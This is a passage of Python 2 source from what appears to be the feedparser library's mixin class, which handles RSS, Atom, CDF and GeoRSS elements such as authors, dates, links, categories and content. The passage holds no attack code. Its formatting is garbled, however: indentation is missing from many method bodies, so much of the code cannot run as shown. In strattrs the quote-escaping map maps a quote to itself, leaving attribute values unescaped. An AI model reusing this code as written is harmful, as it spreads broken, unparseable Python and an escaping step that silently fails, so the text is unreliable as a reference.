                # unknown entity: preserve it verbatim
                text = '&%s;' % ref
            else:
                text = unichr(name2codepoint[ref]).encode('utf-8')
        self.elementstack[-1][2].append(text)
def handle_data(self, text, escape=1):
# called for each block of plain text, i.e. outside of any tag and
# not containing any character or entity references
if not self.elementstack:
return
if escape and self.contentparams.get('type') == u'application/xhtml+xml':
text = _xmlescape(text)
self.elementstack[-1][2].append(text)
    def handle_comment(self, text):
        # called for each comment, e.g. <!-- insert message here -->
        # comments carry no feed data, so they are ignored
        pass
    def handle_pi(self, text):
        # called for each processing instruction, e.g. <?instruction>
        # processing instructions carry no feed data, so they are ignored
        pass
    def handle_decl(self, text):
        # called for the DOCTYPE declaration; nothing to extract here
        pass
    def parse_declaration(self, i):
        # override internal declaration handler to handle CDATA blocks
        if self.rawdata[i:i+9] == '<![CDATA[':
            k = self.rawdata.find(']]>', i)
            if k == -1:
                # CDATA block began but didn't finish
                k = len(self.rawdata)
                return k
            # re-escape the CDATA payload and feed it through as plain data
            self.handle_data(_xmlescape(self.rawdata[i+9:k]), 0)
            return k+3
        else:
            k = self.rawdata.find('>', i)
            if k >= 0:
                return k+1
            else:
                # We have an incomplete declaration; return -1 so the
                # caller waits for more data.
                return k
def mapContentType(self, contentType):
contentType = contentType.lower()
if contentType == 'text' or contentType == 'plain':
contentType = u'text/plain'
elif contentType == 'html':
contentType = u'text/html'
elif contentType == 'xhtml':
contentType = u'application/xhtml+xml'
return contentType
    def trackNamespace(self, prefix, uri):
        """Record a namespace declaration and map its prefix to the canonical one."""
        loweruri = uri.lower()
        if not self.version:
            # a root-level namespace can identify the feed format itself
            if (prefix, loweruri) == (None, 'http://my.netscape.com/rdf/simple/0.9/'):
                self.version = u'rss090'
            elif loweruri == 'http://purl.org/rss/1.0/':
                self.version = u'rss10'
            elif loweruri == 'http://www.w3.org/2005/atom':
                self.version = u'atom10'
        if loweruri.find(u'backend.userland.com/rss') <> -1:
            # match any backend.userland.com namespace
            uri = u'http://backend.userland.com/rss'
            loweruri = uri
        if loweruri in self._matchnamespaces:
            self.namespacemap[prefix] = self._matchnamespaces[loweruri]
            self.namespacesInUse[self._matchnamespaces[loweruri]] = uri
        else:
            self.namespacesInUse[prefix or ''] = uri
def resolveURI(self, uri):
return _urljoin(self.baseuri or u'', uri)
def decodeEntities(self, element, data):
return data
def strattrs(self, attrs):
return ''.join([' %s="%s"' % (t[0],_xmlescape(t[1],{'"':'"'})) for t in attrs])
def push(self, element, expectingText):
self.elementstack.append([element, expectingText, []])
    def pop(self, element, stripWhitespace=1):
        """Close `element`, post-process its buffered text, and store it.

        Post-processing includes optional base64 decoding, relative-URI
        resolution, entity decoding, plain-text-vs-HTML sniffing, markup
        sanitizing and charset repair; the finished value is written into
        the entry, feed, or source context as appropriate. Returns the
        processed string.
        """
        if not self.elementstack:
            return
        if self.elementstack[-1][0] != element:
            # mismatched close tag; ignore it rather than corrupt the stack
            return
        element, expectingText, pieces = self.elementstack.pop()
        if self.version == u'atom10' and self.contentparams.get('type', u'text') == u'application/xhtml+xml':
            # remove enclosing child element, but only if it is a <div> and
            # only if all the remaining content is nested underneath it.
            # This means that the divs would be retained in the following:
            #    <div>foo</div><div>bar</div>
            while pieces and len(pieces)>1 and not pieces[-1].strip():
                del pieces[-1]
            while pieces and len(pieces)>1 and not pieces[0].strip():
                del pieces[0]
            if pieces and (pieces[0] == '<div>' or pieces[0].startswith('<div ')) and pieces[-1]=='</div>':
                depth = 0
                for piece in pieces[:-1]:
                    if piece.startswith('</'):
                        depth -= 1
                        if depth == 0:
                            break
                    elif piece.startswith('<') and not piece.endswith('/>'):
                        depth += 1
                else:
                    pieces = pieces[1:-1]
        # Ensure each piece is a str for Python 3
        for (i, v) in enumerate(pieces):
            if not isinstance(v, unicode):
                pieces[i] = v.decode('utf-8')
        output = u''.join(pieces)
        if stripWhitespace:
            output = output.strip()
        if not expectingText:
            return output
        # decode base64 content
        if base64 and self.contentparams.get('base64', 0):
            try:
                output = _base64decode(output)
            except binascii.Error:
                pass
            except binascii.Incomplete:
                pass
            except TypeError:
                # In Python 3, base64 takes and outputs bytes, not str
                # This may not be the most correct way to accomplish this
                output = _base64decode(output.encode('utf-8')).decode('utf-8')
        # resolve relative URIs
        if (element in self.can_be_relative_uri) and output:
            # do not resolve guid elements with isPermalink="false"
            if not element == 'id' or self.guidislink:
                output = self.resolveURI(output)
        # decode entities within embedded markup
        if not self.contentparams.get('base64', 0):
            output = self.decodeEntities(element, output)
        # some feed formats require consumers to guess
        # whether the content is html or plain text
        if not self.version.startswith(u'atom') and self.contentparams.get('type') == u'text/plain':
            if self.lookslikehtml(output):
                self.contentparams['type'] = u'text/html'
        # remove temporary cruft from contentparams
        try:
            del self.contentparams['mode']
        except KeyError:
            pass
        try:
            del self.contentparams['base64']
        except KeyError:
            pass
        is_htmlish = self.mapContentType(self.contentparams.get('type', u'text/html')) in self.html_types
        # resolve relative URIs within embedded markup
        if is_htmlish and RESOLVE_RELATIVE_URIS:
            if element in self.can_contain_relative_uris:
                output = _resolveRelativeURIs(output, self.baseuri, self.encoding, self.contentparams.get('type', u'text/html'))
        # sanitize embedded markup
        if is_htmlish and SANITIZE_HTML:
            if element in self.can_contain_dangerous_markup:
                output = _sanitizeHTML(output, self.encoding, self.contentparams.get('type', u'text/html'))
        if self.encoding and not isinstance(output, unicode):
            output = output.decode(self.encoding, 'ignore')
        # address common error where people take data that is already
        # utf-8, presume that it is iso-8859-1, and re-encode it.
        if self.encoding in (u'utf-8', u'utf-8_INVALID_PYTHON_3') and isinstance(output, unicode):
            try:
                output = output.encode('iso-8859-1').decode('utf-8')
            except (UnicodeEncodeError, UnicodeDecodeError):
                pass
        # map win-1252 extensions to the proper code points
        if isinstance(output, unicode):
            output = output.translate(_cp1252)
        # categories/tags/keywords/whatever are handled in _end_category
        if element == 'category':
            return output
        # a deeper title must not clobber a shallower one already captured
        if element == 'title' and -1 < self.title_depth <= self.depth:
            return output
        # store output in appropriate place(s)
        if self.inentry and not self.insource:
            if element == 'content':
                self.entries[-1].setdefault(element, [])
                contentparams = copy.deepcopy(self.contentparams)
                contentparams['value'] = output
                self.entries[-1][element].append(contentparams)
            elif element == 'link':
                if not self.inimage:
                    # query variables in urls in link elements are improperly
                    # converted from `?a=1&b=2` to `?a=1&b;=2` as if they're
                    # unhandled character references. fix this special case.
                    output = re.sub("&([A-Za-z0-9_]+);", "&\g<1>", output)
                    self.entries[-1][element] = output
                    if output:
                        self.entries[-1]['links'][-1]['href'] = output
            else:
                if element == 'description':
                    element = 'summary'
                old_value_depth = self.property_depth_map.setdefault(self.entries[-1], {}).get(element)
                if old_value_depth is None or self.depth <= old_value_depth:
                    self.property_depth_map[self.entries[-1]][element] = self.depth
                    self.entries[-1][element] = output
                if self.incontent:
                    contentparams = copy.deepcopy(self.contentparams)
                    contentparams['value'] = output
                    self.entries[-1][element + '_detail'] = contentparams
        elif (self.infeed or self.insource):# and (not self.intextinput) and (not self.inimage):
            context = self._getContext()
            if element == 'description':
                element = 'subtitle'
            context[element] = output
            if element == 'link':
                # fix query variables; see above for the explanation
                output = re.sub("&([A-Za-z0-9_]+);", "&\g<1>", output)
                context[element] = output
                context['links'][-1]['href'] = output
            elif self.incontent:
                contentparams = copy.deepcopy(self.contentparams)
                contentparams['value'] = output
                context[element + '_detail'] = contentparams
        return output
def pushContent(self, tag, attrsD, defaultContentType, expectingText):
self.incontent += 1
if self.lang:
self.lang=self.lang.replace('_','-')
self.contentparams = FeedParserDict({
'type': self.mapContentType(attrsD.get('type', defaultContentType)),
'language': self.lang,
'base': self.baseuri})
self.contentparams['base64'] = self._isBase64(attrsD, self.contentparams)
self.push(tag, expectingText)
def popContent(self, tag):
value = self.pop(tag)
self.incontent -= 1
self.contentparams.clear()
return value
# a number of elements in a number of RSS variants are nominally plain
# text, but this is routinely ignored. This is an attempt to detect
# the most common cases. As false positives often result in silent
# data loss, this function errs on the conservative side.
@staticmethod
def lookslikehtml(s):
# must have a close tag or an entity reference to qualify
if not (re.search(r'</(\w+)>',s) or re.search("&#?\w+;",s)):
return
# all tags must be in a restricted subset of valid HTML tags
if filter(lambda t: t.lower() not in _HTMLSanitizer.acceptable_elements,
re.findall(r'</?(\w+)',s)):
return
# all entities must have been defined as valid HTML entities
if filter(lambda e: e not in entitydefs.keys(), re.findall(r'&(\w+);', s)):
return
return 1
def _mapToStandardPrefix(self, name):
colonpos = name.find(':')
if colonpos <> -1:
prefix = name[:colonpos]
suffix = name[colonpos+1:]
prefix = self.namespacemap.get(prefix, prefix)
name = prefix + ':' + suffix
return name
def _getAttribute(self, attrsD, name):
return attrsD.get(self._mapToStandardPrefix(name))
def _isBase64(self, attrsD, contentparams):
if attrsD.get('mode', '') == 'base64':
return 1
if self.contentparams['type'].startswith(u'text/'):
return 0
if self.contentparams['type'].endswith(u'+xml'):
return 0
if self.contentparams['type'].endswith(u'/xml'):
return 0
return 1
def _itsAnHrefDamnIt(self, attrsD):
href = attrsD.get('url', attrsD.get('uri', attrsD.get('href', None)))
if href:
try:
del attrsD['url']
except KeyError:
pass
try:
del attrsD['uri']
except KeyError:
pass
attrsD['href'] = href
return attrsD
def _save(self, key, value, overwrite=False):
context = self._getContext()
if overwrite:
context[key] = value
else:
context.setdefault(key, value)
def _start_rss(self, attrsD):
versionmap = {'0.91': u'rss091u',
'0.92': u'rss092',
'0.93': u'rss093',
'0.94': u'rss094'}
#If we're here then this is an RSS feed.
#If we don't have a version or have a version that starts with something
#other than RSS then there's been a mistake. Correct it.
if not self.version or not self.version.startswith(u'rss'):
attr_version = attrsD.get('version', '')
version = versionmap.get(attr_version)
if version:
self.version = version
elif attr_version.startswith('2.'):
self.version = u'rss20'
else:
self.version = u'rss'
    def _start_channel(self, attrsD):
        # <channel> marks the start of feed-level data (RSS/CDF)
        self.infeed = 1
        self._cdf_common(attrsD)
    def _cdf_common(self, attrsD):
        # CDF stores the modification time and link as attributes; replay
        # them through the normal element handlers (injecting the attribute
        # value as the element's collected text) so they're parsed uniformly
        if 'lastmod' in attrsD:
            self._start_modified({})
            self.elementstack[-1][-1] = attrsD['lastmod']
            self._end_modified()
        if 'href' in attrsD:
            self._start_link({})
            self.elementstack[-1][-1] = attrsD['href']
            self._end_link()
def _start_feed(self, attrsD):
self.infeed = 1
versionmap = {'0.1': u'atom01',
'0.2': u'atom02',
'0.3': u'atom03'}
if not self.version:
attr_version = attrsD.get('version')
version = versionmap.get(attr_version)
if version:
self.version = version
else:
self.version = u'atom'
    def _end_channel(self):
        # leaving the feed-level element
        self.infeed = 0
    _end_feed = _end_channel
    def _start_image(self, attrsD):
        # feed-level images get their own sub-dict; entry-level ones do not
        context = self._getContext()
        if not self.inentry:
            context.setdefault('image', FeedParserDict())
        self.inimage = 1
        self.title_depth = -1
        self.push('image', 0)
    def _end_image(self):
        self.pop('image')
        self.inimage = 0
    def _start_textinput(self, attrsD):
        # RSS <textInput> gets its own sub-dict in the feed data
        context = self._getContext()
        context.setdefault('textinput', FeedParserDict())
        self.intextinput = 1
        self.title_depth = -1
        self.push('textinput', 0)
    _start_textInput = _start_textinput
    def _end_textinput(self):
        self.pop('textinput')
        self.intextinput = 0
    _end_textInput = _end_textinput
    def _start_author(self, attrsD):
        self.inauthor = 1
        self.push('author', 1)
        # Append a new FeedParserDict when expecting an author
        context = self._getContext()
        context.setdefault('authors', [])
        context['authors'].append(FeedParserDict())
    _start_managingeditor = _start_author
    _start_dc_author = _start_author
    _start_dc_creator = _start_author
    _start_itunes_author = _start_author
    def _end_author(self):
        self.pop('author')
        self.inauthor = 0
        # reconcile the combined author string with author_detail
        self._sync_author_detail()
    _end_managingeditor = _end_author
    _end_dc_author = _end_author
    _end_dc_creator = _end_author
    _end_itunes_author = _end_author
    def _start_itunes_owner(self, attrsD):
        # iTunes <owner> is stored under the 'publisher' key
        self.inpublisher = 1
        self.push('publisher', 0)
    def _end_itunes_owner(self):
        self.pop('publisher')
        self.inpublisher = 0
        self._sync_author_detail('publisher')
    def _start_contributor(self, attrsD):
        self.incontributor = 1
        context = self._getContext()
        context.setdefault('contributors', [])
        context['contributors'].append(FeedParserDict())
        self.push('contributor', 0)
    def _end_contributor(self):
        self.pop('contributor')
        self.incontributor = 0
    def _start_dc_contributor(self, attrsD):
        # dc:contributor has no sub-elements; its text is the name itself
        self.incontributor = 1
        context = self._getContext()
        context.setdefault('contributors', [])
        context['contributors'].append(FeedParserDict())
        self.push('name', 0)
    def _end_dc_contributor(self):
        self._end_name()
        self.incontributor = 0
    def _start_name(self, attrsD):
        self.push('name', 0)
    _start_itunes_name = _start_name
    def _end_name(self):
        # route the collected name to whichever person/context is open
        value = self.pop('name')
        if self.inpublisher:
            self._save_author('name', value, 'publisher')
        elif self.inauthor:
            self._save_author('name', value)
        elif self.incontributor:
            self._save_contributor('name', value)
        elif self.intextinput:
            context = self._getContext()
            context['name'] = value
    _end_itunes_name = _end_name
    def _start_width(self, attrsD):
        self.push('width', 0)
def _end_width(self):
value = self.pop('width')
try:
value = int(value)
except ValueError:
value = 0
if self.inimage:
context = self._getContext()
context['width'] = value
    def _start_height(self, attrsD):
        self.push('height', 0)
def _end_height(self):
value = self.pop('height')
try:
value = int(value)
except ValueError:
value = 0
if self.inimage:
context = self._getContext()
context['height'] = value
    def _start_url(self, attrsD):
        # url/homepage/uri are all collected under 'href'
        self.push('href', 1)
    _start_homepage = _start_url
    _start_uri = _start_url
    def _end_url(self):
        value = self.pop('href')
        if self.inauthor:
            self._save_author('href', value)
        elif self.incontributor:
            self._save_contributor('href', value)
    _end_homepage = _end_url
    _end_uri = _end_url
    def _start_email(self, attrsD):
        self.push('email', 0)
    _start_itunes_email = _start_email
    def _end_email(self):
        # route the address to whichever person context is open
        value = self.pop('email')
        if self.inpublisher:
            self._save_author('email', value, 'publisher')
        elif self.inauthor:
            self._save_author('email', value)
        elif self.incontributor:
            self._save_contributor('email', value)
    _end_itunes_email = _end_email
def _getContext(self):
if self.insource:
context = self.sourcedata
elif self.inimage and 'image' in self.feeddata:
context = self.feeddata['image']
elif self.intextinput:
context = self.feeddata['textinput']
elif self.inentry:
context = self.entries[-1]
else:
context = self.feeddata
return context
    def _save_author(self, key, value, prefix='author'):
        # write into both the `<prefix>_detail` dict and the `authors` list,
        # then resync the combined author string
        context = self._getContext()
        context.setdefault(prefix + '_detail', FeedParserDict())
        context[prefix + '_detail'][key] = value
        self._sync_author_detail()
        context.setdefault('authors', [FeedParserDict()])
        context['authors'][-1][key] = value
def _save_contributor(self, key, value):
context = self._getContext()
context.setdefault('contributors', [FeedParserDict()])
context['contributors'][-1][key] = value
def _sync_author_detail(self, key='author'):
context = self._getContext()
detail = context.get('%s_detail' % key)
if detail:
name = detail.get('name')
email = detail.get('email')
if name and email:
context[key] = u'%s (%s)' % (name, email)
elif name:
context[key] = name
elif email:
context[key] = email
else:
author, email = context.get(key), None
if not author:
return
emailmatch = re.search(ur'''(([a-zA-Z0-9\_\-\.\+]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([a-zA-Z0-9\-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\]?))(\?subject=\S+)?''', author)
if emailmatch:
email = emailmatch.group(0)
# probably a better way to do the following, but it passes all the tests
author = author.replace(email, u'')
author = author.replace(u'()', u'')
author = author.replace(u'<>', u'')
author = author.replace(u'<>', u'')
author = author.strip()
if author and (author[0] == u'('):
author = author[1:]
if author and (author[-1] == u')'):
author = author[:-1]
author = author.strip()
if author or email:
context.setdefault('%s_detail' % key, FeedParserDict())
if author:
context['%s_detail' % key]['name'] = author
if email:
context['%s_detail' % key]['email'] = email
    def _start_subtitle(self, attrsD):
        # subtitle/tagline are plain-text content elements
        self.pushContent('subtitle', attrsD, u'text/plain', 1)
    _start_tagline = _start_subtitle
    _start_itunes_subtitle = _start_subtitle
    def _end_subtitle(self):
        self.popContent('subtitle')
    _end_tagline = _end_subtitle
    _end_itunes_subtitle = _end_subtitle
    def _start_rights(self, attrsD):
        # rights/copyright are plain-text content elements
        self.pushContent('rights', attrsD, u'text/plain', 1)
    _start_dc_rights = _start_rights
    _start_copyright = _start_rights
    def _end_rights(self):
        self.popContent('rights')
    _end_dc_rights = _end_rights
    _end_copyright = _end_rights
    def _start_item(self, attrsD):
        # open a new entry and reset per-entry tracking state
        self.entries.append(FeedParserDict())
        self.push('item', 0)
        self.inentry = 1
        self.guidislink = 0
        self.title_depth = -1
        self.psc_chapters_flag = None
        # RDF items carry their id in rdf:about
        id = self._getAttribute(attrsD, 'rdf:about')
        if id:
            context = self._getContext()
            context['id'] = id
        self._cdf_common(attrsD)
    _start_entry = _start_item
    def _end_item(self):
        self.pop('item')
        self.inentry = 0
    _end_entry = _end_item
    def _start_dc_language(self, attrsD):
        self.push('language', 1)
    _start_language = _start_dc_language
    def _end_dc_language(self):
        # the feed-declared language becomes the current language
        self.lang = self.pop('language')
    _end_language = _end_dc_language
    def _start_dc_publisher(self, attrsD):
        self.push('publisher', 1)
    _start_webmaster = _start_dc_publisher
    def _end_dc_publisher(self):
        self.pop('publisher')
        self._sync_author_detail('publisher')
    _end_webmaster = _end_dc_publisher
    def _start_published(self, attrsD):
        self.push('published', 1)
    _start_dcterms_issued = _start_published
    _start_issued = _start_published
    _start_pubdate = _start_published
    def _end_published(self):
        value = self.pop('published')
        # always refresh the parsed form alongside the raw string
        self._save('published_parsed', _parse_date(value), overwrite=True)
    _end_dcterms_issued = _end_published
    _end_issued = _end_published
    _end_pubdate = _end_published
    def _start_updated(self, attrsD):
        self.push('updated', 1)
    _start_modified = _start_updated
    _start_dcterms_modified = _start_updated
    _start_dc_date = _start_updated
    _start_lastbuilddate = _start_updated
    def _end_updated(self):
        value = self.pop('updated')
        parsed_value = _parse_date(value)
        # always refresh the parsed form alongside the raw string
        self._save('updated_parsed', parsed_value, overwrite=True)
    _end_modified = _end_updated
    _end_dcterms_modified = _end_updated
    _end_dc_date = _end_updated
    _end_lastbuilddate = _end_updated
    def _start_created(self, attrsD):
        self.push('created', 1)
    _start_dcterms_created = _start_created
    def _end_created(self):
        value = self.pop('created')
        self._save('created_parsed', _parse_date(value), overwrite=True)
    _end_dcterms_created = _end_created
    def _start_expirationdate(self, attrsD):
        self.push('expired', 1)
    def _end_expirationdate(self):
        self._save('expired_parsed', _parse_date(self.pop('expired')), overwrite=True)
    # geospatial location, or "where", from georss.org
    def _start_georssgeom(self, attrsD):
        # all simple GeoRSS shapes share one geometry buffer and a 'where' dict
        self.push('geometry', 0)
        context = self._getContext()
        context['where'] = FeedParserDict()
    _start_georss_point = _start_georssgeom
    _start_georss_line = _start_georssgeom
    _start_georss_polygon = _start_georssgeom
    _start_georss_box = _start_georssgeom
def _save_where(self, geometry):
context = self._getContext()
context['where'].update(geometry)
    def _end_georss_point(self):
        # parse the buffered coordinate text into a point geometry
        geometry = _parse_georss_point(self.pop('geometry'))
        if geometry:
            self._save_where(geometry)
    def _end_georss_line(self):
        geometry = _parse_georss_line(self.pop('geometry'))
        if geometry:
            self._save_where(geometry)
    def _end_georss_polygon(self):
        this = self.pop('geometry')
        geometry = _parse_georss_polygon(this)
        if geometry:
            self._save_where(geometry)
    def _end_georss_box(self):
        geometry = _parse_georss_box(self.pop('geometry'))
        if geometry:
            self._save_where(geometry)
    def _start_where(self, attrsD):
        # GML-style <where> wrapper; geometry details come from child elements
        self.push('where', 0)
        context = self._getContext()
        context['where'] = FeedParserDict()
    _start_georss_where = _start_where
def _parse_srs_attrs(self, attrsD):
srsName = attrsD.get('srsname')
try:
srsDimension = int(attrsD.get('srsdimension', '2'))
except ValueError:
srsDimension = 2
context = self._getContext()
context['where']['srsName'] = srsName
context['where']['srsDimension'] = srsDimension
    def _start_gml_point(self, attrsD):
        self._parse_srs_attrs(attrsD)
        self.ingeometry = 1
        self.push('geometry', 0)
    def _start_gml_linestring(self, attrsD):
        self._parse_srs_attrs(attrsD)
        # the geometry kind steers _parse_poslist later
        self.ingeometry = 'linestring'
        self.push('geometry', 0)
    def _start_gml_polygon(self, attrsD):
        self._parse_srs_attrs(attrsD)
        self.push('geometry', 0)
    def _start_gml_exterior(self, attrsD):
        self.push('geometry', 0)
    def _start_gml_linearring(self, attrsD):
        self.ingeometry = 'polygon'
        self.push('geometry', 0)
    def _start_gml_pos(self, attrsD):
        self.push('pos', 0)
    def _end_gml_pos(self):
        this = self.pop('pos')
        context = self._getContext()
        srsName = context['where'].get('srsName')
        srsDimension = context['where'].get('srsDimension', 2)
        swap = True
        if srsName and "EPSG" in srsName:
            epsg = int(srsName.split(":")[-1])
            # geographic coordinate systems list lat before lon, so swap
            swap = bool(epsg in _geogCS)
        geometry = _parse_georss_point(this, swap=swap, dims=srsDimension)
        if geometry:
            self._save_where(geometry)
    def _start_gml_poslist(self, attrsD):
        self.push('pos', 0)
    def _end_gml_poslist(self):
        this = self.pop('pos')
        context = self._getContext()
        srsName = context['where'].get('srsName')
        srsDimension = context['where'].get('srsDimension', 2)
        swap = True
        if srsName and "EPSG" in srsName:
            epsg = int(srsName.split(":")[-1])
            # geographic coordinate systems list lat before lon, so swap
            swap = bool(epsg in _geogCS)
        geometry = _parse_poslist(
            this, self.ingeometry, swap=swap, dims=srsDimension)
        if geometry:
            self._save_where(geometry)
def _end_geom(self):
self.ingeometry = 0
self.pop('geometry')
_end_gml_point = _end_geom
_end_gml_linestring = _end_geom
_end_gml_linearring = _end_geom
_end_gml_exterior = _end_geom
_end_gml_polygon = _end_geom
def _end_where(self):
self.pop('where')
_end_georss_where = _end_where
# end geospatial
    def _start_cc_license(self, attrsD):
        # Creative Commons license given as an rdf:resource attribute;
        # record it as a rel="license" link
        context = self._getContext()
        value = self._getAttribute(attrsD, 'rdf:resource')
        attrsD = FeedParserDict()
        attrsD['rel'] = u'license'
        if value:
            attrsD['href']=value
        context.setdefault('links', []).append(attrsD)
    def _start_creativecommons_license(self, attrsD):
        self.push('license', 1)
    _start_creativeCommons_license = _start_creativecommons_license
    def _end_creativecommons_license(self):
        # the license URL arrives as element text; convert it into a
        # rel="license" link and drop the temporary 'license' key
        value = self.pop('license')
        context = self._getContext()
        attrsD = FeedParserDict()
        attrsD['rel'] = u'license'
        if value:
            attrsD['href'] = value
        context.setdefault('links', []).append(attrsD)
        del context['license']
    _end_creativeCommons_license = _end_creativecommons_license
    def _addTag(self, term, scheme, label):
        """Append a {term, scheme, label} tag to the current context, skipping
        completely empty and duplicate tags."""
        context = self._getContext()
        tags = context.setdefault('tags', [])
        if (not term) and (not scheme) and (not label):
            return
        value = FeedParserDict({'term': term, 'scheme': scheme, 'label': label})
        if value not in tags:
            tags.append(value)
def _start_category(self, attrsD):
term = attrsD.get('term')
scheme = attrsD.get('scheme', attrsD.get('domain'))
label = attrsD.get('label')
self._addTag(term, scheme, label)
self.push('category', 1)
_start_dc_subject = _start_category
_start_keywords = _start_category
def _start_media_category(self, attrsD):
attrsD.setdefault('scheme', u'http://search.yahoo.com/mrss/category_schema')
self._start_category(attrsD)
def _end_itunes_keywords(self):
for term in self.pop('itunes_keywords').split(','):
if term.strip():
self._addTag(term.strip(), u'http://www.itunes.com/', None)
def _start_itunes_category(self, attrsD):
self._addTag(attrsD.get('text'), u'http://www.itunes.com/', None)
self.push('category', 1)
def _end_category(self):
value = self.pop('category')
if not value:
return
context = self._getContext()
tags = context['tags']
if value and len(tags) and not tags[-1]['term']:
tags[-1]['term'] = value
else:
self._addTag(value, None, None)
_end_dc_subject = _end_category
_end_keywords = _end_category
_end_itunes_category = _end_category
_end_media_category = _end_category
    def _start_cloud(self, attrsD):
        # RSS <cloud> is attribute-only; store the attributes directly
        self._getContext()['cloud'] = FeedParserDict(attrsD)
    def _start_link(self, attrsD):
        """Open a <link> element, defaulting rel/type and recording the link."""
        attrsD.setdefault('rel', u'alternate')
        if attrsD['rel'] == u'self':
            attrsD.setdefault('type', u'application/atom+xml')
        else:
            attrsD.setdefault('type', u'text/html')
        context = self._getContext()
        attrsD = self._itsAnHrefDamnIt(attrsD)
        if 'href' in attrsD:
            attrsD['href'] = self.resolveURI(attrsD['href'])
        expectingText = self.infeed or self.inentry or self.insource
        context.setdefault('links', [])
        if not (self.inentry and self.inimage):
            context['links'].append(FeedParserDict(attrsD))
        if 'href' in attrsD:
            # href given as attribute -> no element text expected
            expectingText = 0
            if (attrsD.get('rel') == u'alternate') and (self.mapContentType(attrsD.get('type')) in self.html_types):
                context['link'] = attrsD['href']
        else:
            self.push('link', expectingText)
    def _end_link(self):
        # Pop to balance the push in _start_link; the value itself is unused.
        value = self.pop('link')
    def _start_guid(self, attrsD):
        # An absent isPermaLink attribute defaults to 'true' per RSS 2.0.
        self.guidislink = (attrsD.get('ispermalink', 'true') == 'true')
        self.push('id', 1)
    _start_id = _start_guid
    def _end_guid(self):
        value = self.pop('id')
        self._save('guidislink', self.guidislink and 'link' not in self._getContext())
        if self.guidislink:
            # guid acts as link, but only if 'ispermalink' is not present or is 'true',
            # and only if the item doesn't already have a link element
            self._save('link', value)
    _end_id = _end_guid
    def _start_title(self, attrsD):
        # Inside inline SVG, <title> is SVG markup, not the feed title.
        if self.svgOK:
            return self.unknown_starttag('title', attrsD.items())
        self.pushContent('title', attrsD, u'text/plain', self.infeed or self.inentry or self.insource)
    _start_dc_title = _start_title
    _start_media_title = _start_title
    def _end_title(self):
        if self.svgOK:
            return
        value = self.popContent('title')
        if not value:
            return
        # Remember the element depth of the title we accepted.
        self.title_depth = self.depth
    _end_dc_title = _end_title
    def _end_media_title(self):
        # A media:title must not clobber the depth recorded for the real title.
        title_depth = self.title_depth
        self._end_title()
        self.title_depth = title_depth
    def _start_description(self, attrsD):
        # A second summary-like element is treated as content instead.
        context = self._getContext()
        if 'summary' in context:
            self._summaryKey = 'content'
            self._start_content(attrsD)
        else:
            self.pushContent('description', attrsD, u'text/html', self.infeed or self.inentry or self.insource)
    _start_dc_description = _start_description
    _start_media_description = _start_description
    def _start_abstract(self, attrsD):
        # Like _start_description but abstracts are plain text, not HTML.
        self.pushContent('description', attrsD, u'text/plain', self.infeed or self.inentry or self.insource)
    def _end_description(self):
        # Mirror _start_description: close as content if it was rerouted there.
        if self._summaryKey == 'content':
            self._end_content()
        else:
            value = self.popContent('description')
        self._summaryKey = None
    _end_abstract = _end_description
    _end_dc_description = _end_description
    _end_media_description = _end_description
    def _start_info(self, attrsD):
        # Atom 0.3 <info> element (also emitted by FeedBurner).
        self.pushContent('info', attrsD, u'text/plain', 1)
    _start_feedburner_browserfriendly = _start_info
    def _end_info(self):
        self.popContent('info')
    _end_feedburner_browserfriendly = _end_info
    def _start_generator(self, attrsD):
        # Capture the generator's attributes (e.g. uri/version) as detail.
        if attrsD:
            attrsD = self._itsAnHrefDamnIt(attrsD)
            if 'href' in attrsD:
                attrsD['href'] = self.resolveURI(attrsD['href'])
        self._getContext()['generator_detail'] = FeedParserDict(attrsD)
        self.push('generator', 1)
    def _end_generator(self):
        # The element text becomes the generator's human-readable name.
        value = self.pop('generator')
        context = self._getContext()
        if 'generator_detail' in context:
            context['generator_detail']['name'] = value
    def _start_admin_generatoragent(self, attrsD):
        # RDF-style generator: the value lives in rdf:resource, so inject it
        # into the element stack before popping.
        self.push('generator', 1)
        value = self._getAttribute(attrsD, 'rdf:resource')
        if value:
            self.elementstack[-1][2].append(value)
        self.pop('generator')
        self._getContext()['generator_detail'] = FeedParserDict({'href': value})
    def _start_admin_errorreportsto(self, attrsD):
        # Same rdf:resource injection pattern as _start_admin_generatoragent.
        self.push('errorreportsto', 1)
        value = self._getAttribute(attrsD, 'rdf:resource')
        if value:
            self.elementstack[-1][2].append(value)
        self.pop('errorreportsto')
    def _start_summary(self, attrsD):
        # A second summary is rerouted into 'content' to avoid clobbering.
        context = self._getContext()
        if 'summary' in context:
            self._summaryKey = 'content'
            self._start_content(attrsD)
        else:
            self._summaryKey = 'summary'
            self.pushContent(self._summaryKey, attrsD, u'text/plain', 1)
    _start_itunes_summary = _start_summary
    def _end_summary(self):
        # Close whichever key _start_summary actually opened.
        if self._summaryKey == 'content':
            self._end_content()
        else:
            self.popContent(self._summaryKey or 'summary')
        self._summaryKey = None
    _end_itunes_summary = _end_summary
    def _start_enclosure(self, attrsD):
        # Enclosures are normalized into the links list with rel='enclosure'.
        attrsD = self._itsAnHrefDamnIt(attrsD)
        context = self._getContext()
        attrsD['rel'] = u'enclosure'
        context.setdefault('links', []).append(FeedParserDict(attrsD))
    def _start_source(self, attrsD):
        if 'url' in attrsD:
            # This means that we're processing a source element from an RSS 2.0 feed
            self.sourcedata['href'] = attrsD[u'url']
        self.push('source', 1)
        self.insource = 1
        # Reset so titles inside <source> are tracked independently.
        self.title_depth = -1
    def _end_source(self):
        # Snapshot accumulated source data into the context, then clear it.
        self.insource = 0
        value = self.pop('source')
        if value:
            self.sourcedata['title'] = value
        self._getContext()['source'] = copy.deepcopy(self.sourcedata)
        self.sourcedata.clear()
    def _start_content(self, attrsD):
        self.pushContent('content', attrsD, u'text/plain', 1)
        # Atom out-of-line content: remember the src URI.
        src = attrsD.get('src')
        if src:
            self.contentparams['src'] = src
        self.push('content', 1)
    def _start_body(self, attrsD):
        # An inline <body> element is XHTML content.
        self.pushContent('content', attrsD, u'application/xhtml+xml', 1)
    _start_xhtml_body = _start_body
    def _start_content_encoded(self, attrsD):
        # content:encoded is escaped HTML by definition.
        self.pushContent('content', attrsD, u'text/html', 1)
    _start_fullitem = _start_content_encoded
    def _end_content(self):
        # Text-ish content doubles as the summary for convenience.
        copyToSummary = self.mapContentType(self.contentparams.get('type')) in ([u'text/plain'] + self.html_types)
        value = self.popContent('content')
        if copyToSummary:
            self._save('summary', value)
    _end_body = _end_content
    _end_xhtml_body = _end_content
